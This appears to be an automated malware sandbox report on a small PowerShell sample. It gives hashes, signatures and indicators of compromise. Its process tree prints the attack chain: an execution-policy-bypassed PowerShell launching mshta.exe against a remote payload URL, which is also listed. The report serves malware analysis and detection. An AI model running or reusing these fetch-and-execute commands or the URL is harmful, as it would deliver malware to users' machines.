Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
05/05/2024, 18:11
Static task
static1
Behavioral task
behavioral1
Sample
target.ps1
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
target.ps1
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
target.ps1
Resource
win11-20240419-en
General
-
Target
target.ps1
-
Size
154B
-
MD5
e92339c8a8820df2920d180ffcc66d45
-
SHA1
23968fbc5ae4fdf48fd699dcfee8c417317b0444
-
SHA256
15c486428ca6ef7add4c57355497f270f2a38ed43c40b994933d67d5f7e664fc
-
SHA512
dba5d0942a75a139fb5c5d67f8421fa0bb3c6f351554677117c46a9136cd12d4940ca80ef94796dfc578dbe81000c08d02ac19709453b26ac810e0d1b6db7abe
Malware Config
Extracted
https://fatodex.b-cdn.net/fatodex
Signatures
-
pid Process 1368 powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1368 powershell.exe 3020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1368 wrote to memory of 3020 1368 powershell.exe 29 PID 1368 wrote to memory of 3020 1368 powershell.exe 29 PID 1368 wrote to memory of 3020 1368 powershell.exe 29 PID 3020 wrote to memory of 2072 3020 powershell.exe 30 PID 3020 wrote to memory of 2072 3020 powershell.exe 30 PID 3020 wrote to memory of 2072 3020 powershell.exe 30
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\target.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . mshta.exe https://fatodex.b-cdn.net/fatodex2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex3⤵
- Modifies Internet Explorer settings
PID:2072
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b5eaf45866ff7ac4d25bcd67f7d0c3cd
SHA1caac2e05a0ddb62bf7ef2ee94fc0f36d46a5dda1
SHA2567f8bcb75e79bd979e6906a7a9100c1c83c3f7b1aca2b5320835aee6ca830fe04
SHA512ce7bddbdf68a3f651eea14ed906b6270d4ab2a1a88314837a963ced78794aec3066aeda6886fcca820eedbc1b0e4df2177227e1a2bbced2fb47a6783593109f6